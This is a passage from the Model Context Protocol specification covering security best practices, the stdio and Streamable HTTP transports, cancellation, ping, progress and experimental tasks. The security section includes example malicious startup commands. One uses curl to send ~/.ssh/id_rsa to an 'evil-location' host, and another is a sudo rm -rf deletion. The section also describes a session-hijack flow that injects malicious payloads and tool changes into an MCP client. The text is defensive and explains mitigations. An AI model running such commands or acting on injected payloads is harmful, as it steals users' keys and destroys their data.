ServerA-->>Client: Respond with session ID
Attacker->>ServerB: Access/guess session ID
Note right of Attacker: Attacker knows/guesses session ID
Attacker->>ServerB: Trigger event (malicious payload, using session ID)
ServerB->>Queue: Enqueue event (keyed by session ID)
ServerA->>Queue: Poll for events (using session ID)
Queue-->>ServerA: Event data (malicious payload)
ServerA-->>Client: Async response (malicious payload)
Client->>Client: Acts based on malicious payload
```
#### Session Hijack Impersonation
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
participant Attacker
Client->>Server: Initialize (login/authenticate)
Server-->>Client: Respond with session ID (persistent session created)
Attacker->>Server: Access/guess session ID
Note right of Attacker: Attacker knows/guesses session ID
Attacker->>Server: Make API call (using session ID, no re-auth)
Server-->>Attacker: Respond as if Attacker is Client (session hijack)
```
#### Attack Description
When you have multiple stateful HTTP servers that handle MCP requests, the following attack vectors are possible:
**Session Hijack Prompt Injection**
1. The client connects to **Server A** and receives a session ID.
2. The attacker obtains an existing session ID and sends a malicious event to **Server B** with said session ID.
* When a server supports [redelivery/resumable streams](/specification/2025-11-25/basic/transports#resumability-and-redelivery), deliberately terminating the request before receiving the response could lead to it being resumed by the original client via the GET request for server sent events.
* If a particular server initiates server sent events as a consequence of a tool call such as a `notifications/tools/list_changed`, where it is possible to affect the tools that are offered by the server, a client could end up with tools that they were not aware were enabled.
3. **Server B** enqueues the event (associated with session ID) into a shared queue.
4. **Server A** polls the queue for events using the session ID and retrieves the malicious payload.
5. **Server A** sends the malicious payload to the client as an asynchronous or resumed response.
6. The client receives and acts on the malicious payload, leading to potential compromise.
**Session Hijack Impersonation**
1. The MCP client authenticates with the MCP server, creating a persistent session ID.
2. The attacker obtains the session ID.
3. The attacker makes calls to the MCP server using the session ID.
4. MCP server does not check for additional authorization and treats the attacker as a legitimate user, allowing unauthorized access or actions.
#### Mitigation
To prevent session hijacking and event injection attacks, the following mitigations should be implemented:
MCP servers that implement authorization **MUST** verify all inbound requests.
MCP Servers **MUST NOT** use sessions for authentication.
MCP servers **MUST** use secure, non-deterministic session IDs.
Generated session IDs (e.g., UUIDs) **SHOULD** use secure random number generators. Avoid predictable or sequential session identifiers that could be guessed by an attacker. Rotating or expiring session IDs can also reduce the risk.
MCP servers **SHOULD** bind session IDs to user-specific information.
When storing or transmitting session-related data (e.g., in a queue), combine the session ID with information unique to the authorized user, such as their internal user ID. Use a key format like `:`. This ensures that even if an attacker guesses a session ID, they cannot impersonate another user as the user ID is derived from the user token and not provided by the client.
MCP servers can optionally leverage additional unique identifiers.
### Local MCP Server Compromise
Local MCP servers are MCP Servers running on a user's local machine, either by the user downloading and executing a server, authoring a server themselves, or installing through a client's configuration flows. These servers may have direct access to the user's system and may be accessible to other processes running on the user's machine, making them attractive targets for attacks.
#### Attack Description
Local MCP servers are binaries that are downloaded and executed on the same machine as the MCP client. Without proper sandboxing and consent requirements in place, the following attacks become possible:
1. An attacker includes a malicious "startup" command in a client configuration
2. An attacker distributes a malicious payload inside the server itself
3. An attacker accesses an insecure local server that's left running on localhost via DNS rebinding
Example malicious startup commands that could be embedded:
```bash theme={null}
# Data exfiltration
npx malicious-package && curl -X POST -d @~/.ssh/id_rsa https://example.com/evil-location
# Privilege escalation
sudo rm -rf /important/system/files && echo "MCP server installed!"
```
#### Risks
Local MCP servers with inadequate restrictions or from untrusted sources introduce several critical security risks:
* **Arbitrary code execution**. Attackers can execute any command with MCP client privileges.
* **No visibility**. Users have no insight into what commands are being executed.
* **Command obfuscation**. Malicious actors can use complex or convoluted commands to appear legitimate.
* **Data exfiltration**. Attackers can access legitimate local MCP servers via compromised javascript.
* **Data loss**. Attackers or bugs in legitimate servers could lead to irrecoverable data loss on the host machine.
#### Mitigation
If an MCP client supports one-click local MCP server configuration, it **MUST** implement proper consent mechanisms prior to executing commands.
**Pre-Configuration Consent**
Display a clear consent dialog before connecting a new local MCP server via one-click configuration. The MCP client **MUST**:
* Show the exact command that will be executed, without truncation (include arguments and parameters)
* Clearly identify it as a potentially dangerous operation that executes code on the user's system
* Require explicit user approval before proceeding
* Allow users to cancel the configuration
The MCP client **SHOULD** implement additional checks and guardrails to mitigate potential code execution attack vectors:
* Highlight potentially dangerous command patterns (e.g., commands containing `sudo`, `rm -rf`, network operations, file system access outside expected directories)
* Display warnings for commands that access sensitive locations (home directory, SSH keys, system directories)
* Warn that MCP servers run with the same privileges as the client
* Execute MCP server commands in a sandboxed environment with minimal default privileges
* Launch MCP servers with restricted access to the file system, network, and other system resources
* Provide mechanisms for users to explicitly grant additional privileges (e.g., specific directory access, network access) when needed
* Use platform-appropriate sandboxing technologies (containers, chroot, application sandboxes, etc.)
MCP servers intending for their servers to be run locally **SHOULD** implement measures to prevent unauthorized usage from malicious processes:
* Use the `stdio` transport to limit access to just the MCP client
* Restrict access if using an HTTP transport, such as:
* Require an authorization token
* Use unix domain sockets or other Interprocess Communication (IPC) mechanisms with restricted access
### Scope Minimization
Poor scope design increases token compromise impact, elevates user friction, and obscures audit trails.
#### Attack Description
An attacker obtains (via log leakage, memory scraping, or local interception) an access token carrying broad scopes (`files:*`, `db:*`, `admin:*`) that were granted up front because the MCP server exposed every scope in `scopes_supported` and the client requested them all. The token enables lateral data access, privilege chaining, and difficult revocation without re-consenting the entire surface.
#### Risks
* Expanded blast radius: stolen broad token enables unrelated tool/resource access
* Higher friction on revocation: revoking a max-privilege token disrupts all workflows
* Audit noise: single omnibus scope masks user intent per operation
* Privilege chaining: attacker can immediately invoke high-risk tools without further elevation prompts
* Consent abandonment: users decline dialogs listing excessive scopes
* Scope inflation blindness: lack of metrics makes over-broad requests normalised
#### Mitigation
Implement a progressive, least-privilege scope model:
* Minimal initial scope set (e.g., `mcp:tools-basic`) containing only low-risk discovery/read operations
* Incremental elevation via targeted `WWW-Authenticate` `scope="..."` challenges when privileged operations are first attempted
* Down-scoping tolerance: server should accept reduced scope tokens; auth server MAY issue a subset of requested scopes
Server guidance:
* Emit precise scope challenges; avoid returning the full catalog
* Log elevation events (scope requested, granted subset) with correlation IDs
Client guidance:
* Begin with only baseline scopes (or those specified by initial `WWW-Authenticate`)
* Cache recent failures to avoid repeated elevation loops for denied scopes
#### Common Mistakes
* Publishing all possible scopes in `scopes_supported`
* Using wildcard or omnibus scopes (`*`, `all`, `full-access`)
* Bundling unrelated privileges to preempt future prompts
* Returning entire scope catalog in every challenge
* Silent scope semantic changes without versioning
* Treating claimed scopes in token as sufficient without server-side authorization logic
Proper minimization constrains compromise impact, improves audit clarity, and reduces consent churn.
# Transports
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/transports
**Protocol Revision**: 2025-11-25
MCP uses JSON-RPC to encode messages. JSON-RPC messages **MUST** be UTF-8 encoded.
The protocol currently defines two standard transport mechanisms for client-server
communication:
1. [stdio](#stdio), communication over standard in and standard out
2. [Streamable HTTP](#streamable-http)
Clients **SHOULD** support stdio whenever possible.
It is also possible for clients and servers to implement
[custom transports](#custom-transports) in a pluggable fashion.
## stdio
In the **stdio** transport:
* The client launches the MCP server as a subprocess.
* The server reads JSON-RPC messages from its standard input (`stdin`) and sends messages
to its standard output (`stdout`).
* Messages are individual JSON-RPC requests, notifications, or responses.
* Messages are delimited by newlines, and **MUST NOT** contain embedded newlines.
* The server **MAY** write UTF-8 strings to its standard error (`stderr`) for any
logging purposes including informational, debug, and error messages.
* The client **MAY** capture, forward, or ignore the server's `stderr` output
and **SHOULD NOT** assume `stderr` output indicates error conditions.
* The server **MUST NOT** write anything to its `stdout` that is not a valid MCP message.
* The client **MUST NOT** write anything to the server's `stdin` that is not a valid MCP
message.
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server Process
Client->>+Server Process: Launch subprocess
loop Message Exchange
Client->>Server Process: Write to stdin
Server Process->>Client: Write to stdout
Server Process--)Client: Optional logs on stderr
end
Client->>Server Process: Close stdin, terminate subprocess
deactivate Server Process
```
## Streamable HTTP
This replaces the [HTTP+SSE
transport](/specification/2024-11-05/basic/transports#http-with-sse) from
protocol version 2024-11-05. See the [backwards compatibility](#backwards-compatibility)
guide below.
In the **Streamable HTTP** transport, the server operates as an independent process that
can handle multiple client connections. This transport uses HTTP POST and GET requests.
Server can optionally make use of
[Server-Sent Events](https://en.wikipedia.org/wiki/Server-sent_events) (SSE) to stream
multiple server messages. This permits basic MCP servers, as well as more feature-rich
servers supporting streaming and server-to-client notifications and requests.
The server **MUST** provide a single HTTP endpoint path (hereafter referred to as the
**MCP endpoint**) that supports both POST and GET methods. For example, this could be a
URL like `https://example.com/mcp`.
#### Security Warning
When implementing Streamable HTTP transport:
1. Servers **MUST** validate the `Origin` header on all incoming connections to prevent DNS rebinding attacks
* If the `Origin` header is present and invalid, servers **MUST** respond with HTTP 403 Forbidden. The HTTP response
body **MAY** comprise a JSON-RPC *error response* that has no `id`
2. When running locally, servers **SHOULD** bind only to localhost (127.0.0.1) rather than all network interfaces (0.0.0.0)
3. Servers **SHOULD** implement proper authentication for all connections
Without these protections, attackers could use DNS rebinding to interact with local MCP servers from remote websites.
### Sending Messages to the Server
Every JSON-RPC message sent from the client **MUST** be a new HTTP POST request to the
MCP endpoint.
1. The client **MUST** use HTTP POST to send JSON-RPC messages to the MCP endpoint.
2. The client **MUST** include an `Accept` header, listing both `application/json` and
`text/event-stream` as supported content types.
3. The body of the POST request **MUST** be a single JSON-RPC *request*, *notification*, or *response*.
4. If the input is a JSON-RPC *response* or *notification*:
* If the server accepts the input, the server **MUST** return HTTP status code 202
Accepted with no body.
* If the server cannot accept the input, it **MUST** return an HTTP error status code
(e.g., 400 Bad Request). The HTTP response body **MAY** comprise a JSON-RPC *error
response* that has no `id`.
5. If the input is a JSON-RPC *request*, the server **MUST** either
return `Content-Type: text/event-stream`, to initiate an SSE stream, or
`Content-Type: application/json`, to return one JSON object. The client **MUST**
support both these cases.
6. If the server initiates an SSE stream:
* The server **SHOULD** immediately send an SSE event consisting of an event
ID and an empty `data` field in order to prime the client to reconnect
(using that event ID as `Last-Event-ID`).
* After the server has sent an SSE event with an event ID to the client, the
server **MAY** close the *connection* (without terminating the *SSE stream*)
at any time in order to avoid holding a long-lived connection. The client
**SHOULD** then "poll" the SSE stream by attempting to reconnect.
* If the server does close the *connection* prior to terminating the *SSE stream*,
it **SHOULD** send an SSE event with a standard [`retry`](https://html.spec.whatwg.org/multipage/server-sent-events.html#:~:text=field%20name%20is%20%22retry%22) field before
closing the connection. The client **MUST** respect the `retry` field,
waiting the given number of milliseconds before attempting to reconnect.
* The SSE stream **SHOULD** eventually include a JSON-RPC *response* for the
JSON-RPC *request* sent in the POST body.
* The server **MAY** send JSON-RPC *requests* and *notifications* before sending the
JSON-RPC *response*. These messages **SHOULD** relate to the originating client
*request*.
* The server **MAY** terminate the SSE stream if the [session](#session-management)
expires.
* After the JSON-RPC *response* has been sent, the server **SHOULD** terminate the
SSE stream.
* Disconnection **MAY** occur at any time (e.g., due to network conditions).
Therefore:
* Disconnection **SHOULD NOT** be interpreted as the client cancelling its request.
* To cancel, the client **SHOULD** explicitly send an MCP `CancelledNotification`.
* To avoid message loss due to disconnection, the server **MAY** make the stream
[resumable](#resumability-and-redelivery).
### Listening for Messages from the Server
1. The client **MAY** issue an HTTP GET to the MCP endpoint. This can be used to open an
SSE stream, allowing the server to communicate to the client, without the client first
sending data via HTTP POST.
2. The client **MUST** include an `Accept` header, listing `text/event-stream` as a
supported content type.
3. The server **MUST** either return `Content-Type: text/event-stream` in response to
this HTTP GET, or else return HTTP 405 Method Not Allowed, indicating that the server
does not offer an SSE stream at this endpoint.
4. If the server initiates an SSE stream:
* The server **MAY** send JSON-RPC *requests* and *notifications* on the stream.
* These messages **SHOULD** be unrelated to any concurrently-running JSON-RPC
*request* from the client.
* The server **MUST NOT** send a JSON-RPC *response* on the stream **unless**
[resuming](#resumability-and-redelivery) a stream associated with a previous client
request.
* The server **MAY** close the SSE stream at any time.
* If the server closes the *connection* without terminating the *stream*, it
**SHOULD** follow the same polling behavior as described for POST requests:
sending a `retry` field and allowing the client to reconnect.
* The client **MAY** close the SSE stream at any time.
### Multiple Connections
1. The client **MAY** remain connected to multiple SSE streams simultaneously.
2. The server **MUST** send each of its JSON-RPC messages on only one of the connected
streams; that is, it **MUST NOT** broadcast the same message across multiple streams.
* The risk of message loss **MAY** be mitigated by making the stream
[resumable](#resumability-and-redelivery).
### Resumability and Redelivery
To support resuming broken connections, and redelivering messages that might otherwise be
lost:
1. Servers **MAY** attach an `id` field to their SSE events, as described in the
[SSE standard](https://html.spec.whatwg.org/multipage/server-sent-events.html#event-stream-interpretation).
* If present, the ID **MUST** be globally unique across all streams within that
[session](#session-management)—or all streams with that specific client, if session
management is not in use.
* Event IDs **SHOULD** encode sufficient information to identify the originating
stream, enabling the server to correlate a `Last-Event-ID` to the correct stream.
2. If the client wishes to resume after a disconnection (whether due to network failure
or server-initiated closure), it **SHOULD** issue an HTTP GET to the MCP endpoint,
and include the
[`Last-Event-ID`](https://html.spec.whatwg.org/multipage/server-sent-events.html#the-last-event-id-header)
header to indicate the last event ID it received.
* The server **MAY** use this header to replay messages that would have been sent
after the last event ID, *on the stream that was disconnected*, and to resume the
stream from that point.
* The server **MUST NOT** replay messages that would have been delivered on a
different stream.
* This mechanism applies regardless of how the original stream was initiated (via
POST or GET). Resumption is always via HTTP GET with `Last-Event-ID`.
In other words, these event IDs should be assigned by servers on a *per-stream* basis, to
act as a cursor within that particular stream.
### Session Management
An MCP "session" consists of logically related interactions between a client and a
server, beginning with the [initialization phase](/specification/2025-11-25/basic/lifecycle). To support
servers which want to establish stateful sessions:
1. A server using the Streamable HTTP transport **MAY** assign a session ID at
initialization time, by including it in an `MCP-Session-Id` header on the HTTP
response containing the `InitializeResult`.
* The session ID **SHOULD** be globally unique and cryptographically secure (e.g., a
securely generated UUID, a JWT, or a cryptographic hash).
* The session ID **MUST** only contain visible ASCII characters (ranging from 0x21 to
0x7E).
* The client **MUST** handle the session ID in a secure manner, see [Session Hijacking mitigations](/specification/2025-11-25/basic/security_best_practices#session-hijacking) for more details.
2. If an `MCP-Session-Id` is returned by the server during initialization, clients using
the Streamable HTTP transport **MUST** include it in the `MCP-Session-Id` header on
all of their subsequent HTTP requests.
* Servers that require a session ID **SHOULD** respond to requests without an
`MCP-Session-Id` header (other than initialization) with HTTP 400 Bad Request.
3. The server **MAY** terminate the session at any time, after which it **MUST** respond
to requests containing that session ID with HTTP 404 Not Found.
4. When a client receives HTTP 404 in response to a request containing an
`MCP-Session-Id`, it **MUST** start a new session by sending a new `InitializeRequest`
without a session ID attached.
5. Clients that no longer need a particular session (e.g., because the user is leaving
the client application) **SHOULD** send an HTTP DELETE to the MCP endpoint with the
`MCP-Session-Id` header, to explicitly terminate the session.
* The server **MAY** respond to this request with HTTP 405 Method Not Allowed,
indicating that the server does not allow clients to terminate sessions.
### Sequence Diagram
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
note over Client, Server: initialization
Client->>+Server: POST InitializeRequest
Server->>-Client: InitializeResponse MCP-Session-Id: 1868a90c...
Client->>+Server: POST InitializedNotification MCP-Session-Id: 1868a90c...
Server->>-Client: 202 Accepted
note over Client, Server: client requests
Client->>+Server: POST ... request ... MCP-Session-Id: 1868a90c...
alt single HTTP response
Server->>Client: ... response ...
else server opens SSE stream
loop while connection remains open
Server-)Client: ... SSE messages from server ...
end
Server-)Client: SSE event: ... response ...
end
deactivate Server
note over Client, Server: client notifications/responses
Client->>+Server: POST ... notification/response ... MCP-Session-Id: 1868a90c...
Server->>-Client: 202 Accepted
note over Client, Server: server requests
Client->>+Server: GET MCP-Session-Id: 1868a90c...
loop while connection remains open
Server-)Client: ... SSE messages from server ...
end
deactivate Server
```
### Protocol Version Header
If using HTTP, the client **MUST** include the `MCP-Protocol-Version: ` HTTP header on all subsequent requests to the MCP
server, allowing the MCP server to respond based on the MCP protocol version.
For example: `MCP-Protocol-Version: 2025-11-25`
The protocol version sent by the client **SHOULD** be the one [negotiated during
initialization](/specification/2025-11-25/basic/lifecycle#version-negotiation).
For backwards compatibility, if the server does *not* receive an `MCP-Protocol-Version`
header, and has no other way to identify the version - for example, by relying on the
protocol version negotiated during initialization - the server **SHOULD** assume protocol
version `2025-03-26`.
If the server receives a request with an invalid or unsupported
`MCP-Protocol-Version`, it **MUST** respond with `400 Bad Request`.
### Backwards Compatibility
Clients and servers can maintain backwards compatibility with the deprecated [HTTP+SSE
transport](/specification/2024-11-05/basic/transports#http-with-sse) (from
protocol version 2024-11-05) as follows:
**Servers** wanting to support older clients should:
* Continue to host both the SSE and POST endpoints of the old transport, alongside the
new "MCP endpoint" defined for the Streamable HTTP transport.
* It is also possible to combine the old POST endpoint and the new MCP endpoint, but
this may introduce unneeded complexity.
**Clients** wanting to support older servers should:
1. Accept an MCP server URL from the user, which may point to either a server using the
old transport or the new transport.
2. Attempt to POST an `InitializeRequest` to the server URL, with an `Accept` header as
defined above:
* If it succeeds, the client can assume this is a server supporting the new Streamable
HTTP transport.
* If it fails with the following HTTP status codes "400 Bad Request", "404 Not
Found" or "405 Method Not Allowed":
* Issue a GET request to the server URL, expecting that this will open an SSE stream
and return an `endpoint` event as the first event.
* When the `endpoint` event arrives, the client can assume this is a server running
the old HTTP+SSE transport, and should use that transport for all subsequent
communication.
## Custom Transports
Clients and servers **MAY** implement additional custom transport mechanisms to suit
their specific needs. The protocol is transport-agnostic and can be implemented over any
communication channel that supports bidirectional message exchange.
Implementers who choose to support custom transports **MUST** ensure they preserve the
JSON-RPC message format and lifecycle requirements defined by MCP. Custom transports
**SHOULD** document their specific connection establishment and message exchange patterns
to aid interoperability.
# Cancellation
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/utilities/cancellation
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) supports optional cancellation of in-progress requests
through notification messages. Either side can send a cancellation notification to
indicate that a previously-issued request should be terminated.
## Cancellation Flow
When a party wants to cancel an in-progress request, it sends a `notifications/cancelled`
notification containing:
* The ID of the request to cancel
* An optional reason string that can be logged or displayed
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/cancelled",
"params": {
"requestId": "123",
"reason": "User requested cancellation"
}
}
```
## Behavior Requirements
1. Cancellation notifications **MUST** only reference requests that:
* Were previously issued in the same direction
* Are believed to still be in-progress
2. The `initialize` request **MUST NOT** be cancelled by clients
3. For [task-augmented requests](./tasks), the `tasks/cancel` request **MUST** be used instead of the `notifications/cancelled` notification. Tasks have their own dedicated cancellation mechanism that returns the final task state.
4. Receivers of cancellation notifications **SHOULD**:
* Stop processing the cancelled request
* Free associated resources
* Not send a response for the cancelled request
5. Receivers **MAY** ignore cancellation notifications if:
* The referenced request is unknown
* Processing has already completed
* The request cannot be cancelled
6. The sender of the cancellation notification **SHOULD** ignore any response to the
request that arrives afterward
## Timing Considerations
Due to network latency, cancellation notifications may arrive after request processing
has completed, and potentially after a response has already been sent.
Both parties **MUST** handle these race conditions gracefully:
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Client->>Server: Request (ID: 123)
Note over Server: Processing starts
Client--)Server: notifications/cancelled (ID: 123)
alt
Note over Server: Processing may have completed before cancellation arrives
else If not completed
Note over Server: Stop processing
end
```
## Implementation Notes
* Both parties **SHOULD** log cancellation reasons for debugging
* Application UIs **SHOULD** indicate when cancellation is requested
## Error Handling
Invalid cancellation notifications **SHOULD** be ignored:
* Unknown request IDs
* Already completed requests
* Malformed notifications
This maintains the "fire and forget" nature of notifications while allowing for race
conditions in asynchronous communication.
# Ping
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/utilities/ping
**Protocol Revision**: 2025-11-25
The Model Context Protocol includes an optional ping mechanism that allows either party
to verify that their counterpart is still responsive and the connection is alive.
## Overview
The ping functionality is implemented through a simple request/response pattern. Either
the client or server can initiate a ping by sending a `ping` request.
## Message Format
A ping request is a standard JSON-RPC request with no parameters:
```json theme={null}
{
"jsonrpc": "2.0",
"id": "123",
"method": "ping"
}
```
## Behavior Requirements
1. The receiver **MUST** respond promptly with an empty response:
```json theme={null}
{
"jsonrpc": "2.0",
"id": "123",
"result": {}
}
```
2. If no response is received within a reasonable timeout period, the sender **MAY**:
* Consider the connection stale
* Terminate the connection
* Attempt reconnection procedures
## Usage Patterns
```mermaid theme={null}
sequenceDiagram
participant Sender
participant Receiver
Sender->>Receiver: ping request
Receiver->>Sender: empty response
```
## Implementation Considerations
* Implementations **SHOULD** periodically issue pings to detect connection health
* The frequency of pings **SHOULD** be configurable
* Timeouts **SHOULD** be appropriate for the network environment
* Excessive pinging **SHOULD** be avoided to reduce network overhead
## Error Handling
* Timeouts **SHOULD** be treated as connection failures
* Multiple failed pings **MAY** trigger connection reset
* Implementations **SHOULD** log ping failures for diagnostics
# Progress
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/utilities/progress
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) supports optional progress tracking for long-running
operations through notification messages. Either side can send progress notifications to
provide updates about operation status.
## Progress Flow
When a party wants to *receive* progress updates for a request, it includes a
`progressToken` in the request metadata.
* Progress tokens **MUST** be a string or integer value
* Progress tokens can be chosen by the sender using any means, but **MUST** be unique
across all active requests.
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "some_method",
"params": {
"_meta": {
"progressToken": "abc123"
}
}
}
```
The receiver **MAY** then send progress notifications containing:
* The original progress token
* The current progress value so far
* An optional "total" value
* An optional "message" value
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/progress",
"params": {
"progressToken": "abc123",
"progress": 50,
"total": 100,
"message": "Reticulating splines..."
}
}
```
* The `progress` value **MUST** increase with each notification, even if the total is
unknown.
* The `progress` and the `total` values **MAY** be floating point.
* The `message` field **SHOULD** provide relevant human readable progress information.
## Behavior Requirements
1. Progress notifications **MUST** only reference tokens that:
* Were provided in an active request
* Are associated with an in-progress operation
2. Receivers of progress requests **MAY**:
* Choose not to send any progress notifications
* Send notifications at whatever frequency they deem appropriate
* Omit the total value if unknown
3. For [task-augmented requests](./tasks), the `progressToken` provided in the original request **MUST** continue to be used for progress notifications throughout the task's lifetime, even after the `CreateTaskResult` has been returned. The progress token remains valid and associated with the task until the task reaches a terminal status.
* Progress notifications for tasks **MUST** use the same `progressToken` that was provided in the initial task-augmented request
* Progress notifications for tasks **MUST** stop after the task reaches a terminal status (`completed`, `failed`, or `cancelled`)
```mermaid theme={null}
sequenceDiagram
participant Sender
participant Receiver
Note over Sender,Receiver: Request with progress token
Sender->>Receiver: Method request with progressToken
Note over Sender,Receiver: Progress updates
Receiver-->>Sender: Progress notification (0.2/1.0)
Receiver-->>Sender: Progress notification (0.6/1.0)
Receiver-->>Sender: Progress notification (1.0/1.0)
Note over Sender,Receiver: Operation complete
Receiver->>Sender: Method response
```
## Implementation Notes
* Senders and receivers **SHOULD** track active progress tokens
* Both parties **SHOULD** implement rate limiting to prevent flooding
* Progress notifications **MUST** stop after completion
# Tasks
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/utilities/tasks
**Protocol Revision**: 2025-11-25
Tasks were introduced in version 2025-11-25 of the MCP specification and are currently considered **experimental**.
The design and behavior of tasks may evolve in future protocol versions.
The Model Context Protocol (MCP) allows requestors — which can be either clients or servers, depending on the direction of communication — to augment their requests with **tasks**. Tasks are durable state machines that carry information about the underlying execution state of the request they wrap, and are intended for requestor polling and deferred result retrieval. Each task is uniquely identifiable by a receiver-generated **task ID**.
Tasks are useful for representing expensive computations and batch processing requests, and integrate seamlessly with external job APIs.
## Definitions
Tasks represent parties as either "requestors" or "receivers," defined as follows:
* **Requestor:** The sender of a task-augmented request. This can be the client or the server — either can create tasks.
* **Receiver:** The receiver of a task-augmented request, and the entity executing the task. This can be the client or the server — either can receive and execute tasks.
## User Interaction Model
Tasks are designed to be **requestor-driven** - requestors are responsible for augmenting requests with tasks and for polling for the results of those tasks; meanwhile, receivers tightly control which requests (if any) support task-based execution and manages the lifecycles of those tasks.
This requestor-driven approach ensures deterministic response handling and enables sophisticated patterns such as dispatching concurrent requests, which only the requestor has sufficient context to orchestrate.
Implementations are free to expose tasks through any interface pattern that suits their needs — the protocol itself does not mandate any specific user interaction model.
## Capabilities
Servers and clients that support task-augmented requests **MUST** declare a `tasks` capability during initialization. The `tasks` capability is structured by request category, with boolean properties indicating which specific request types support task augmentation.
### Server Capabilities
Servers declare if they support tasks, and if so, which server-side requests can be augmented with tasks.
| Capability | Description |
| --------------------------- | ---------------------------------------------------- |
| `tasks.list` | Server supports the `tasks/list` operation |
| `tasks.cancel` | Server supports the `tasks/cancel` operation |
| `tasks.requests.tools.call` | Server supports task-augmented `tools/call` requests |
```json theme={null}
{
"capabilities": {
"tasks": {
"list": {},
"cancel": {},
"requests": {
"tools": {
"call": {}
}
}
}
}
}
```
### Client Capabilities
Clients declare if they support tasks, and if so, which client-side requests can be augmented with tasks.
| Capability | Description |
| --------------------------------------- | ---------------------------------------------------------------- |
| `tasks.list` | Client supports the `tasks/list` operation |
| `tasks.cancel` | Client supports the `tasks/cancel` operation |
| `tasks.requests.sampling.createMessage` | Client supports task-augmented `sampling/createMessage` requests |
| `tasks.requests.elicitation.create` | Client supports task-augmented `elicitation/create` requests |
```json theme={null}
{
"capabilities": {
"tasks": {
"list": {},
"cancel": {},
"requests": {
"sampling": {
"createMessage": {}
},
"elicitation": {
"create": {}
}
}
}
}
}
```
### Capability Negotiation
During the initialization phase, both parties exchange their `tasks` capabilities to establish which operations support task-based execution. Requestors **SHOULD** only augment requests with a task if the corresponding capability has been declared by the receiver.
For example, if a server's capabilities include `tasks.requests.tools.call: {}`, then clients may augment `tools/call` requests with a task. If a client's capabilities include `tasks.requests.sampling.createMessage: {}`, then servers may augment `sampling/createMessage` requests with a task.
If `capabilities.tasks` is not defined, the peer **SHOULD NOT** attempt to create tasks during requests.
The set of capabilities in `capabilities.tasks.requests` is exhaustive. If a request type is not present, it does not support task-augmentation.
`capabilities.tasks.list` controls if the `tasks/list` operation is supported by the party.
`capabilities.tasks.cancel` controls if the `tasks/cancel` operation is supported by the party.
### Tool-Level Negotiation
Tool calls are given special consideration for the purpose of task augmentation. In the result of `tools/list`, tools declare support for tasks via `execution.taskSupport`, which if present can have a value of `"required"`, `"optional"`, or `"forbidden"`.
This is to be interpreted as a fine-grained layer in addition to capabilities, following these rules:
1. If a server's capabilities do not include `tasks.requests.tools.call`, then clients **MUST NOT** attempt to use task augmentation on that server's tools, regardless of the `execution.taskSupport` value.
2. If a server's capabilities include `tasks.requests.tools.call`, then clients consider the value of `execution.taskSupport`, and handle it accordingly:
1. If `execution.taskSupport` is not present or `"forbidden"`, clients **MUST NOT** attempt to invoke the tool as a task. Servers **SHOULD** return a `-32601` (Method not found) error if a client attempts to do so. This is the default behavior.
2. If `execution.taskSupport` is `"optional"`, clients **MAY** invoke the tool as a task or as a normal request.
3. If `execution.taskSupport` is `"required"`, clients **MUST** invoke the tool as a task. Servers **MUST** return a `-32601` (Method not found) error if a client does not attempt to do so.
## Protocol Messages
### Creating Tasks
Task-augmented requests follow a two-phase response pattern that differs from normal requests:
* **Normal requests**: The server processes the request and returns the actual operation result directly.
* **Task-augmented requests**: The server accepts the request and immediately returns a `CreateTaskResult` containing task data. The actual operation result becomes available later through `tasks/result` after the task completes.
To create a task, requestors send a request with the `task` field included in the request params. Requestors **MAY** include a `ttl` value indicating the desired task lifetime duration (in milliseconds) since its creation.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "get_weather",
"arguments": {
"city": "New York"
},
"task": {
"ttl": 60000
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "working",
"statusMessage": "The operation is now in progress.",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 60000,
"pollInterval": 5000
}
}
}
```
When a receiver accepts a task-augmented request, it returns a [`CreateTaskResult`](/specification/2025-11-25/schema#createtaskresult) containing task data. The response does not include the actual operation result. The actual result (e.g., tool result for `tools/call`) becomes available only through `tasks/result` after the task completes.
When a task is created in response to a `tools/call` request, host applications may wish to return control to the model while the task is executing. This allows the model to continue processing other requests or perform additional work while waiting for the task to complete.
To support this pattern, servers can provide an optional `io.modelcontextprotocol/model-immediate-response` key in the `_meta` field of the `CreateTaskResult`. The value of this key should be a string intended to be passed as an immediate tool result to the model.
If a server does not provide this field, the host application can fall back to its own predefined message.
This guidance is non-binding and is provisional logic intended to account for the specific use case. This behavior may be formalized or modified as part of `CreateTaskResult` in future protocol versions.
### Getting Tasks
In the Streamable HTTP (SSE) transport, clients **MAY** disconnect from an SSE stream opened by the server in response to a `tasks/get` request at any time.
While this note is not prescriptive regarding the specific usage of SSE streams, all implementations **MUST** continue to comply with the existing [Streamable HTTP transport specification](../transports#sending-messages-to-the-server).
Requestors poll for task completion by sending [`tasks/get`](/specification/2025-11-25/schema#tasks%2Fget) requests.
Requestors **SHOULD** respect the `pollInterval` provided in responses when determining polling frequency.
Requestors **SHOULD** continue polling until the task reaches a terminal status (`completed`, `failed`, or `cancelled`), or until encountering the [`input_required`](#input-required-status) status. Note that invoking `tasks/result` does not imply that the requestor needs to stop polling - requestors **SHOULD** continue polling the task status via `tasks/get` if they are not actively waiting for `tasks/result` to complete.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "tasks/get",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "working",
"statusMessage": "The operation is now in progress.",
